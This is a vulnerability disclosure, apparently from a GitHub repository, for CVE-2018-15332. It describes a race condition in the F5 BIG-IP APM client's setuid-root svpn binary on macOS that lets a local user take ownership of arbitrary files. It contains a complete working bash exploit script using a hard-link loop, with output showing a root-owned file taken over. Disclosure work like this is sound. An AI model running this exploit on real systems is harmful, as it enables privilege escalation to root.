Skip to content
Permalink
Branch: master
Find file Copy path
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
123 lines (86 sloc) 3.27 KB
Title: F5 BIG-IP APM client for Linux and macOS arbitrary file takeover vulnerability
Author: Rich Mirch
CVE: CVE-2018-15332
Vendor Advisory: https://support.f5.com/csp/article/K12130880
Description
Version 7.1.7.1 included patches for the CVE-2018-5546 vulnerability
however I discovered that the fix did not resolve the issue. The
update does resolve the previous test case that I provided however
there is a new race condition while insecurely calling the chown()
and chmod().
The svpn binary changes the ownership of the svpn.log file within
the users home directory. A low privileged user can create a symlink
or hard link(if the target file resides on the same file system) and
take ownership of arbitrary files. This can lead to the escalation of
privileges to root. PoC is provided for macOS
MacOS path $HOME/Library/Logs/F5Networks/svpn.log
CVSS
Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:R
Base: 7.8
Temporal: 7.1
Test Environment
OS: macOS 10.13.6
Kernel: Darwin Kernel Version 17.7.0
ISO: apmclients-7171.2018.808.2011-24.0.iso
com.f5.vpn: 7171.2018.0808.1
Proof Of Concept
Note: A low privileged account named user1 is used for all test cases.
user1@macbook[~]$ id
uid=509(user1) gid=20(staff) groups=20(staff)
Note: For this PoC, the /tmp/test.log file was created by the root account.
[Step 1] Show that user1 cannot write to /tmp/test.log
user1@macbook[~]$ ls -ld /tmp/test.log
-rw-r--r-- 1 root wheel 0 Sep 6 21:10 /tmp/test.log
user1@macbook[~]$ echo test > /tmp/test.log
-bash: /tmp/test.log: Permission denied
[Step 2] Execute the f5-file-takeover.sh script to take ownership of the /tmp/test.log file.
user1@macbook[~]$ ./f5-file-takeover.sh 2>/dev/null
Target file before: -rw-r--r-- 1 root wheel 0 Sep 6 21:10 /tmp/test.log
Spawning VPN processes
Waiting for processes to exit
SUCCESS
Target file after: -rw------- 1 user1 staff 2110 Sep 6 22:14 /tmp/test.log
#!/bin/bash
################################################################################
# f5-file-takeover.sh
# Win the race condition created by the svpn binary
# which is setuid root to take ownership of any file
#
# Author: Rich Mirch
# Date: 2018-09-06
# Usage: Change target_file to point to a root owned file.
#
################################################################################
#set -x
target_file=/tmp/test.log
echo "Target file before: $(ls -ld $target_file)"
# create a hard link loop
# svpn is slow so this may take several attempts
while true
do
rm -f $HOME/Library/Logs/F5Networks/svpn.log
ln $target_file $HOME/Library/Logs/F5Networks/svpn.log 2>/dev/null
done &
loop_pid=$!
echo "Spawning VPN processes"
for a in {{1..20}}
do $("/Applications/F5 VPN.app/Contents/Helpers/svpn" &)
done
echo "Waiting for processes to exit"
sleep 20
kill -9 $loop_pid 1>/dev/null 2>/dev/null
if [[ -O $target_file ]]
then
echo "SUCCESS"
echo "Target file after: $(ls -ld $target_file)"
else
echo "FAILED"
exit 1
fi
################################################################################
# EOF
################################################################################
Timeline:
2018-09-06: Reported to vendor
2018-09-14: Vendor confirmed vulnerability
2018-12-06: Vendor released fix in 7.1.7.2 and advisory K12130880
You can’t perform that action at this time.